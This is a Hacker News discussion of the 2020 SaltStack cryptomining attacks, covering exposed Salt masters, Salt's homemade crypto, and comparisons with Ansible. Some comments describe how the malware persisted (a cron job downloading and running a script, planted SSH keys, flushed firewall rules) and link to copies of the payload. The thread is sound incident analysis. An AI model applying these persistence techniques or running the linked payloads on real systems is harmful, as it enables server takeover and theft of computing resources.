Hacker News new | past | comments | ask | show | jobs | submit login
SaltStack Mining Attack (saltexploit.com)
157 points by photon-torpedo on May 5, 2020 | hide | past | favorite | 90 comments



>>> If you're here, chances are you're already compromised.

WTF does that mean? Our salt implementation is on an entirely private network, so why would I be more likely than not to be compromised already?

----

Edit: Re-downvotes -- This is a sincere question. Is there some evidence that the majority of salt implementations are compromised, or some mechanism by which this hits private networks? Or is that line just for dramatic effect?


I assumed that the problem was that if a master is accessible on your intranet, it could be hit with some sort of XSS attack from browsers inside the firewall.

But apparently there are 6000 people just straight up exposing their masters to the internet:

https://gbhackers.com/saltstack-salt/


> This whole "don't have your salt master exposed to the internet" thing has me annoyed. The whole point of salt is to manage boxes all over the place. I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again. I'm about to test binding salt-master to localhost and salt-minion to localhost and then setting up spiped to wrap the traffic...

Some companies need better DevOps apparently


Nitpick: this is purely an operations/sysadmin problem.

The DevOps grouping doesn't apply too much, Operations-minded staff should be focusing on keeping things locked down.

Unless, you know, you're not hiring those people and instead are hoping that developers take the Ops burden. ;)


People downvoting: I guess I hit a nerve, but could you explain why?

Development and Operations are different disciplines and the idea was to remove silos, not make one person responsible for both.


But that's like half the point of SaltStack. It's supposed be secure enough to run on the public internet to manage road-warrior endpoints.

"I found this site called Alexa that lists a bunch of companies that just straight up expose their web servers to the internet. Crazy."

And I have some bad news about how many companies are exposing their VPN servers to the internet too.


It's really not.

You also wouldn't expose your database just because it's password-protected?

I bet all these public servers have a firewall running to protect other services.

Shouldn't be hard to include the saltstack port(s) and whitelist the relevant IP addresses.

Also,the main difference with your example is that the clients that connect to webservers and vpns are either not known in advance or don't have static IP addresses.


You can't really compare Salt to a password protected database. SSH is probably a better comparison as both use public key crypto and plenty of servers are exposed on the internet via it. Its just that salt hasn't been audited as heavily as OpenSSH or other implementations of SSH so its risky exposing Salt to the internet, but I can see why some admins might do that.


Anyone who's putting their Salt master on the internet is having to deal with clients without fixed addresses. And it's not uncommon to have to deal with clients that aren't known advance which is when autosign scripts are used.

Sans the current CVE this is otherwise a service that is safe to expose to adversarial networks.


From Algolia's outage retrospective:

  What we did so far:
  We’ve secured the impacted SaltStack service by updating it and adding additional IP filtering, allowing only our servers to connect to it.

So clearly unrestricted access wasn't a necessity.

I understand it's a pain, I've been running a 1000+ server stack with puppet on a public network and relied on iptables to secure it. But I'd rather cope with the daily iptable rules update than having to fight a 0-day exploit...


I would (and do) expose my database to the internet, because it's properly secured (client certificates rather than just passwords).

I don't run firewalls. If a service doesn't need to be exposed, the port isn't open. Means no worrying about who has access to the wifi (because that's outside the security boundary) and no mucking about with VPNs when accessing remotely.


>because it's properly secured

That's what these Saltstack users thought too until this week.


People are saying they used a hand-rolled crypto stack rather than something standard like TLS? That should have been a massive red flag.


> road-warrior endpoints

would or could often have a vpn tunnel back to some static infrastructure, this and not the public network can be used for mgmt


Right, except that registering with the salt master is how your VPN is provisioned.



>>>> If you're here, chances are you're already compromised.

> WTF does that mean?

The website assumes that if you dropped by or googled the vulnerability, it's because you had saltstack exposed to the public internet.

You don't have to react so harshly to that turn of phrase.


My main impression was that this site was blurring the line between professional "Bulletin" and scare-mongering.

> Even if you didn't notice any unexpected symptoms, please: nuke and restart.

If I were writing this, I'd probably write something like "On May x, a remote-code-execution in (all versions?) public salt-masters (not minions?), was unveiled. Shortly thereafter, actual exploitation in the wild is being used. If your salt installation uses a salt-master, and it's internet-reachable, it may already be compromised, along with much your infrastructure. Section 2 is how to see if you are infected, and Section 3 is how to remove the infection."


> Section 2 is how to see if you are infected and Section 3 is how to remove the infection

That's much worse. That implies there is a reliable way to detect and remove the infection. That's not the case. This website included some known attacks and such. There's a high chance that there were attacks of this vulnerability with additional payloads.

There's no way to know if you were hit with a rootkit that persists itself in the bootloader or other parts of your system. There's no way to know if you were infected or not.

The only way to be sure is to nuke the machine, as they said.

Security advice should always err on the right side for a naive reader.


With you on this one... a coworker put it well "[this tone is] at a 9, it needs to be at a 3".


99% of companies I've encountered running SaltStack are masterless anyway.


Salt is a bit of a rarity among ops people but the funny thing is my experience is the opposite of yours - 66%+ of companies I see with Salt run in master/minion mode. I prefer it over Ansible when my ssh settings are super awkward (MFA, multiple bastions, etc) to integrate into an Ansible inventory file. One place with 900+ hosts and 300+ random IP ranges with tons of (badly written) compliance I spent about 3 weeks trying to get an inventory file hacked up and I gave up and deployed Salt within a day for the basic stuff I needed to do for basic running of shell commands from a single point of control.


Most of the places I've seen it are banks. Oddly.

Your use case makes absolute perfect sense though -- nice!


Depends on their use case.

IMO, Salts best feature is probably running with the Master / Minion setup because it connects out to the master. Masterless is handy for using in conjunction with Vagrant, Packer, or another provisioning tool not so much for managing a the lifecycle of a server / OS.


I'm not clueless. I know this. This doesn't detract at all from what I said.

In production, an outsized number of companies are using SaltStack a certain way.

The reason is because of the way we all evaluate business risk. I could have said that out of all of the companies I've worked with using Salt that have compliance requirements, 100% of them are using it Masterless, but then some smart-ass would have piped up with a "not me" comment.


How would you compare it to ansible in that usage model? I don't do much config mgmt these days, so curious for a master(less) mindset, whats the comparison for salt vs. ansible?


Ansible gets a ton more use. Its push model is highly favored in IT organizations. Salt's event/reactor system has tricks Ansible can't do.


Not me


not me :D


SaltStack has a long history of home brew protocols, internally written encryption, security issues, and bugs. I'm not surprised they would end up being used as a vector for attacks.


See also the F-secure timeline where the salt team's gpg key had been expired for years, salt had a lack of clear communication, and general sloth in response

https://labs.f-secure.com/advisories/saltstack-authorization...


Exhibit A: CVE-2013-2228.

As described inthe relevant entry [0] on Debian's Security Tracker:

> SaltStack RSA Key Generation allows remote users to decrypt communications

The fix [1]:

  - gen = RSA.gen_key(keysize, 1, callback=lambda x, y, z: None)
  + gen = RSA.gen_key(keysize, 65537, callback=lambda x, y, z: None)
---

[0]: https://security-tracker.debian.org/tracker/CVE-2013-2228

[1]: https://github.com/saltstack/salt/commit/e8ce66cf688b43aeb3e...


The second parameter in the gen_key function is the RSA public exponent. I believe this means the ciphertext will be the same as the padded plaintext.

Here is the documentation from the RSA.gen_key() function.

    def gen_key(bits, e, callback=keygen_callback):
        # type: (int, int, Callable) -> RSA
        """
        Generate an RSA key pair.

        :param bits: Key length, in bits.

        :param e: The RSA public exponent.

        :param callback: A Python callable object that is invoked
                         during key generation; its usual purpose is to
                         provide visual feedback. The default callback is
                         keygen_callback.

        :return: M2Crypto.RSA.RSA object.
        """
https://gitlab.com/m2crypto/m2crypto/-/blob/master/M2Crypto/...


This is reminiscent of

    int getRandomNumber()
    {
        return 4;  // chosen by fair dice roll.
                   // guaranteed to be random.
    }


Jesus that's some rookie stuff right there


They also built their own low-level network protocol based on 0mq. Back when I tried it, it had constant keepalive issues behind NAT and would randomly lose messages (that was in 2014, probably better now).


It wasn't any better as of last year, and its constant connectivity issues were part of the reason I abandoned it.


This is rookie stuff, but it’s a recurring security issue where crypto libraries have APIs littered with footguns. The “lambda x, y, z: None” just strikes me as cargo culting copy paste code - I’m willing to bet there is other software with the same exploit as they all copied the same answer on StackOverflow


Attributing this just to Salt is deeply unfair. Ansible has had many similar issues over time, also homebrew encryption etc.


Ansible doesn't have a server to expose, let alone publicly. It could be just as bad and still be safer. (So ex. Puppet would also make me nervous) Now, I suspect that Ansible is also in a better position because it's mostly SSH-based, but the architecture also inherently makes it harder to have this level of problem.


What about AWX/Tower? It offers both a GUI and REST interface to the playbooks.


Yep, anything that makes it a server process that listens for connections definitely takes you into the same category. Likewise, running puppet or salt in the local-only mode removes the issue from them.


Serverless isn't a cure all, Ansible has had numerous code exec bugs due to e.g. interpreting strings coming back from remote machines or third party APIs as templates.

Some of these bugs aren't even that old


> Ansible has had numerous code exec bugs due to e.g. interpreting strings coming back from remote machines or third party APIs as templates.

Sure, and that is bad, but the exposure is still way smaller. Let's say that Ansible has a bug that allows code execution on my machine by any target server or API, and Salt has a bug that allows code execution on the master server. In that case, the salt server will be owned by script kiddies within hours and the only way to stop it is me killing it or restricting access. But at the same time, the Ansible bug can't be passively exploited without me running it, and can only be exploited by my own servers or vendors when I decide to interact with them. I don't actually expect AWS/DO/whoever to attack me, and my own servers could be compromised but that's still a much less likely jumping attack.


Both Ansible and Salt are underengineered, but highly convenient.


And this attack payload would have hit ansible servers just as hard. Looking at the payload script if the SSH keys were not password protected it would have logged into the servers https://github.com/Aldenar/salt-malware-sources/blob/master/...


once it had root access it would have hit anything hard. But it wouldn't have been able to get root access in the first place because ansible doesn't have a port listening on the internet


Ansible is relying on SSH for security and does not use any homebrew crypto or protocols by default.


https://linux.die.net/man/3/ansible.fireball

It definitely has them however.


You can use salt over SSH, but it is not the default.


ansible-vault is homebrew crypto


it uses the standard cryptography or pycrypto backends as everything else


> homebrew crypto

AES-256?


I don't understand this claim. ansible-vault uses AES256 which is anything but homebrew.


This is why like me, you're not a cryptographer. AES256 is a cipher, its one component of a cryptosystem. Analysing cryptosystems is a complex area that does not involve vetting software for buzzwords.

I can take AES256 and make it output the image here: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation...

That's not supposed to happen. The part where homebrew diverges from cryptography is that the former involves engineers like us connecting buzzwords together to produce images like the Wikipedia article, the latter involves complex math and rigorous peer review.


I think you're just trolling


Salt uses AES too. The problem is it puts together standard primitives in homebrew protocols. Cryptographic protocol design is as likely to mess your system up as cryptographic primitive design.


What "home brew" protocols and encryption does Salt use?


Something about Salt has always rubbed me the wrong way. I'd rather stick with Puppet, Chef, or CF Engine if I was considering this tool.


I'm all about IT automation and like the tech a lot, but after running SaltStack for 5 years, I decided to transition to plain old written documentation. When you consider everything that underlies the "infrastructure as code" tech stack, it ends up being an extremely steep learning curve. I was very productive with SaltStack but turned into the only person who could write or edit our deployment scripts. It was a bad situation.

Now, nine months after dropping SaltStack, my colleagues are editing the docs I've created, and more importantly, they're also writing their own. That's a huge win. What I've lost in terms of personal productivity, I've regained in terms of wider participation in our standardization and documentation efforts.

I might slowly re-introduce IT automation technologies, maybe something more popular like Ansible or Docker, but only after making sure the rest of my team has a solid understanding of general IT automation concepts. I think we're on the right track. I had a colleague today ask me about what Python programming certification they should get, so I pointed them toward Google's Python-based IT automation course on Coursera. I supported another colleague's efforts to create a library of standard server images based on our internal deployment standards for one of our private clouds, and I'm encouraging them to expand that work to our other data centers. And so on. The team as a whole works better together, so that's where I'm staying focused.


Are you seriously telling me that you went from infrastructure as code to doing things by hand!?


We were always doing things by hand. I was the only one doing any kind of IT automation, and I failed to account for the learning curve of my tooling when trying to expand its use. At least now, the entire team—not just me—is doing a better job of documenting what they're doing by hand.

The reality is that devops toolchains are really complex. For example, to use SaltStack the way I had things set up, it meant learning:

- SaltStack's domain-specific programming language, which amounts to writing Python in YAML

- their macro preprocessor, Jinja, which has completely different syntax and semantics than their DSL

- a programming text editor that supports YAML and Jinja

- Git and GitHub

- secrets management (and there were huge risks here)

- the general concepts of IT automation and infrastructure-as-code

Learning (never mind teaching) that tech stack is really hard. For example, the Google IT Automation with Python certification on Coursera is an 8-month-long course. That's just one bullet point on the above list, and that list doesn't include all the things I wanted to do on top of SaltStack, namely the continuous integration/continuous testing stuff, which would involve learning:

- the Chef InSpec DSL, which is based on Ruby

- branching and tagging

- release engineering

- test-driven development as a software engineering methodology

- software engineering methodology in general

We were struggling with even just writing good documentation, but there I was asking everyone to write good code. That's orders of magnitude harder. It was too much, like asking somebody to run a marathon without any training. I don't care how fit you are. That's just not going to happen.


So you went from full automation to... Copying and pasting by hand?


We all got lucky on this one. The outcome could of been much worse, like secret leaking and rm -rf. We record everything that saltstack does and the scripts didn’t even upload anything from the infected servers.


You may have been lucky, but that was not the case with everyone. Some of the entries appear to be missing, but last night someone setup a honeypot and was posting what they saw.

Adding keys to /root/.ssh/authorized_keys, scp'ing sshkeys, flushing iptables.

I am of course one of the idiots that had it exposed to the internet. I wouldn't do it with a database, but I didn't think twice about salt. Where was my head!


Those things you listed are easily fixed which is what I assume they meant by lucky.


Our server were affected. They added a cronjob which ran every minute wgetting a .sh file and executing it. Most of the time the server which the file was in was either offline or returned 404, but every once in a while it returned the malicious script. When this script got executed, it killed our nginx server, which is how we noticed something odd was happening. If it wasn't for nginx dying, we might have not even noticed we were infected.

Here's the contents of the sh script for the curious. https://pastebin.com/CbupwQMG


Looks like it goes through a massive amount of effort to eliminate competing miners and malware. Should neuter that script and run it periodically on boxes :)


Very helpful. Thank you for sharing.


This hit RamNode too.

> This message is to customers with VPSs on our legacy SolusVM system.

> At approximately 20:34 eastern (GMT -4) on May 2, recently published SaltStack vulnerabilities (CVE-2020-11651, CVE-2020-11652) were used to launch cryptocurrency miners on our SolusVM host nodes. The attack disrupted various services in order to allocate as much CPU as possible to the miners. SSH and QEMU processes were killed on some of our CentOS 6 KVM hosts, causing extended downtime in certain cases.

> Upon detecting the disruption, we quickly began to re-enable SSH, disable and remove Salt, kill related processes, and boot shutdown KVM guests. After careful analysis of the exploit used, we do not believe any data was compromised.

> RamNode was not specifically targeted, but rather anyone running SaltStack versions prior to the one released a few days ago (April 29).


> After careful analysis of the exploit used, we do not believe any data was compromised.

If someone had code running as root on their machine, they can't say that statement with any confidence whatsoever.


> If someone had code running as root on their machine, they can't say that statement with any confidence whatsoever.

Indeed, I think you need to assume all guests running on the affected nodes are now compromised.


Algolia got impacted too, apparently their Salt masters were opened to the whole internet: https://blog.algolia.com/salt-incident-may-3rd-2020-retrospe...


One of DigiCert's Certificate Transparency logs was likewise open to the entire Internet -- and likewise compromised [0]:

> I'm sad to report that we discovered today that CT Log 2's key used to sign SCTs was compromised last night at 7 pm via the Salt vulnerability.

Several other "high-profile" sites have been compromised as well, including LineageOS and Ghost. I expect we'll hear of many more in the next few days.

---

[0]: https://groups.google.com/a/chromium.org/forum/m/#!topic/ct-...


This impacted ghost.org hosting really bad https://status.ghost.org/



Oh god, the responses. Half of them are completely unrelated, asking Lineage to support particular phones.

And then there's someone who saw "salt" and tried to help:

https://twitter.com/mvonwi/status/1256989787321438209


Debian hasn't fixed this yet in their packaging so you might want to work around that if you are using that as a salt-master server.

https://security-tracker.debian.org/tracker/CVE-2020-11651


I'm so grateful this happened over the weekend, when I had time to respond. My girlfriend woke me up and told me the CPU-fan was going crazy in the living room. I realize this isn't the case for everyone. I extend my deepest consolations to those affected.


Former SaltStack user here. If you're using it, just stop. Switch to Ansible, a Kubernetes/Helm/Flux solution or experiment with Chef Habitat if you're feeling futuristic. SaltStack is just bad. It's buggy, clunky and has really bad error messages. Its only saving grace is that it came before Ansible, but that's only relevant in a historical context. Just no.


None of those are compatible solutions.

Ansible is very inflexible when it comes to configuration and how you structure your playbooks.

Kubernetes/Helm/Flux only works if you're inside k8s. I don't know why you would be using Salt for that.

Chef Habitat looks nice, but again. I'm doing more then just management of applications.

The only real alternative to Salt is Puppet. So, No. Just no.


SaltStack is definitely the underdog when comparing puppet/chef or ansible.

But I can chime in on why we use it:

1) First class windows support. (or, as first class as it comes) with no need to enable winrm (which, is much more difficult to do than just installing a salt-minion on first boot)

2) It scales really well; I can run hundreds of thousands of commands in parallel, ansible can't do that; it gets very starved on CPU.

3) It's push based (unlike chef, which you have to run on the client node itself, causing people to cron-job it.

4) it's easily extended; you can write custom modules and it's very easy and pleasant.

---

Now, saying all of that, Salt has warts. Like, hundreds, maybe thousands. It's not uncommon that I find something that's just broken or bugged. Often upgrading fixes 1 bug but makes 3 more. I feel like this might be caused by being an underdog. But it's a real drawback that makes me cautious when recommending it.


Packer with Salt Masterless has been fine though.


We got hit by this on Saturday night :|


How does things like these affect Monero's reputation?

I saw Monero mining in JS libraries, now it is in virus form.

Thus, why Monero? Does Monero somehow discourage these "practices"?


IIRC one of Monero's design goals is that it isn't easily GPU/ASIC-mineable, so CPU mining is competitive. It's also designed to be difficult to trace.

Both of these properties make it a relatively safe and profitable avenue for malware authors.


Mining with JavaScript or WebAssembly is no longer viable as being competitive now requires using a JIT compiler.

Nothing can really be done about it. Pool operators can ban the wallet addresses of known bot masters from connecting to their pool, but you can't really ban someone from participating in an anonymous decentralised network.


Maybe it's to do with the fact that monero tokens are non-fungible, unlike some other crypto-currencies.


I think you mean 'fungible'. Non-fungible means 1 XMR is not equivalent to another 1 XMR. The use of ring signatures, key images and transaction amount hiding gives Monero its fungible properties. This makes it computationally difficult to trace a particular transaction graph. This provides fungibility beyond that of Nakamoto style coins, in that you cannot easily block/identify addresses or transactions.


Monero is likely the absolute most fungible cryptocurrency.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: